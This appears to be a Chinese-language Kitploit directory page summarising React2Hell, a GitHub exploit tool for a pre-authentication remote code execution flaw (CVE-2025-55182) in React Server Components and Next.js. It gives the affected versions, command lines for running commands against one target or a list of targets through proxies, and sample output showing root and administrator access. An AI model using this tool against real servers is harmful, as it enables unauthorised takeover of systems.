Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/aggressiveuser/react2hell
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Next.js/React Server RCE 利用 — CVE-2025-55182。

查看仓库
39个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🧨 React2Hell — CVE-2025-55182 漏洞利用工具

🔥 Next.js / React 服务器远程代码执行 (RCE) 漏洞利用工具

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React 服务器 RCE 漏洞利用工具 — CVE-2025-55182
   作者: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
用法: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 概述

React2Hell 是一款强大的漏洞利用工具,用于测试和利用 CVE-2025-55182,这是一个影响 Next.js 和 React Server Actions 的严重远程代码执行漏洞。

在 React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0 中存在一个预认证远程代码执行漏洞,受影响包包括:react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。脆弱代码会不安全地从 HTTP 请求中对发送到服务器函数端点的载荷进行反序列化。


✨ 特性

  • 🧨 远程代码执行 (RCE)
  • 🌐 单 URL / 批量 URL 扫描
  • 🧩 自定义命令执行
  • 🕵️‍♂️ 通过代理的隐身模式
  • ⚡ 快速、可靠且易于使用

📌 使用方法

单目标模式

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

多目标(从文件读取)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

使用 HTTP 代理(Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

使用 HTTPS 代理

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt 示例

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ 示例输出

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React 服务器 RCE 漏洞利用工具 — CVE-2025-55182
   作者: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] 已加载 3 个目标
════════════════════════════════════════════════════════════════════════

[→] 目标: http://meow.host:3113/
[→] 执行:   whoami
[✓] 存在漏洞 — RCE 成功!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] 目标: http://evil.lab:2000/
[→] 执行:   whoami
[✗] 未发现漏洞 — 状态码: 200
────────────────────────────────────────────────────────────────────────

[→] 目标: https://vul.lab:3000/
[→] 执行:   whoami
[✓] 存在漏洞 — RCE 成功!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] 扫描完成 — 存在漏洞: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ 免责声明

此工具仅用于教育及安全研究目的。 未经明确授权,请勿将其用于任何系统。 您需对自己的行为负责。


⭐ 支持项目

如果此漏洞利用工具对您有帮助,不妨在 GitHub 上留个 ⭐ ❤️


👤 作者

Chetanya Sharma (AggressiveUser)

由热爱破坏与修复的人 🔥 制作

下载工具